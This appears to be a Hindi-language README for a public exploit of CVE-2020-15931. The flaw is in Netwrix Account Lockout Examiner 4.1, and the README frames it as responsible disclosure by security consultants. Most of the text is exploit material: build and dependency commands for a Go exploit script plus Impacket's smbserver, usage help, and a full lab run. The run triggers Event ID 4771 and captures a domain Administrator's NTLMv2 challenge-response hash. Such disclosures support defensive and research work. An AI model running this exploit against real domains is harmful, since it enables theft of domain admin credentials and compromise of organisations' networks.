
Netwrix Account Lockout Examiner 4.1 डोमेन एडमिन खाता क्रेडेंशियल प्रकटीकरण भेद्यता
Netwrix Account Lockout Examiner (ALE) 5.1 से पहले का संस्करण एक अनधिकृत, दूरस्थ प्रतिद्वंद्वी को हमलावर-नियंत्रित सिस्टम से कनेक्शन ट्रिगर करने और डोमेन व्यवस्थापक विशेषाधिकारों वाले खाते का NTLMv1/v2 चैलेंज-रेस्पॉन्स कैप्चर करने की अनुमति देता है। डोमेन व्यवस्थापक खाता पहले से ही इंस्टॉलेशन के लिए आवश्यक उत्पाद के साथ कॉन्फ़िगर किया गया होगा। एक प्रतिद्वंद्वी डोमेन कंट्रोलर पर एकल Kerberos Pre-Authentication Failed (Event ID 4771) इवेंट उत्पन्न करके इसका शोषण कर सकता है।
भेद्यता के बारे में अधिक विवरण निम्नलिखित ब्लॉग पर पाए जा सकते हैं

यह भेद्यता वास्तविक दुनिया में रॉबर्ट सुरासे (@robsauce) और डैनियल मिन (@bigb0ss), ऑप्टिव सिक्योरिटी कंसल्टेंट्स द्वारा सुरक्षा मूल्यांकन करते समय खोजी गई थी। CVE-2020-15931 की पहचान होने पर, ऑप्टिव ने पहचाने गए दोष को जिम्मेदारीपूर्वक प्रकट करने के लिए तुरंत Netwrix से संपर्क किया।
एक्सप्लॉइट स्क्रिप्ट गोलंग में विकसित की गई थी। निम्नलिखित निर्भरताएँ इंस्टॉल करें:
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
यह Impacket से smbserver.py का भी उपयोग करता है।
pip install impacket
अंत में, एक्सप्लॉइट स्क्रिप्ट डाउनलोड करें और इसे बिल्ड करें।
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(नोट: इस लेखन के समय, इस हमले की पहचान केवल ब्लाइंड-आधारित हमले के माध्यम से की जा सकती है। ऐसा इसलिए है क्योंकि यह निर्धारित करना कठिन है कि लक्ष्य संगठन अपने नेटवर्क पर खाता प्रमाणीकरण की ऑडिट करने के लिए Netwrix Account Lockout Examiner का उपयोग कर रहा है या नहीं।)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931